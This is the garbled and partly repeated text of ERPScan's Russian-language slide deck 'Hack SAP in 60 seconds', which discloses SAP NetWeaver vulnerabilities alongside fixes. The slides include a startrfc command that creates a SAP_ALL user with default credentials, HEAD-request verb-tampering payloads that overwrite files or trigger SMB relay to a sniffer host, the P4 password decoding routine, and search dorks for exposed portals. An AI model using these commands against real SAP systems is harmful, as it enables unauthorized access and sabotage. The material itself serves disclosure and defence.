20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Последний год
2011 ndash Атаки на JAVA движок SAP
2011 ndash SQL инъекции в ABAP
2011 ndash Переполнение буффера в ABAP
2011 ndash Атаки Session Fixation в SAP
2011 ndash Атаки на SAPGUI
2011 ndash Спуфинг и перехват DIAG протокола
erpscanru 12ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Угрозы для бизнеса
Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов
Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)
Мошенничествоbull Подмена данных о платежахbull Ложные транзакции
erpscanru 13ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Угрозы для бизнеса
Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов
Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)
Мошенничествоbull Подмена данных о платежахbull Ложные транзакции
erpscanru 13ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
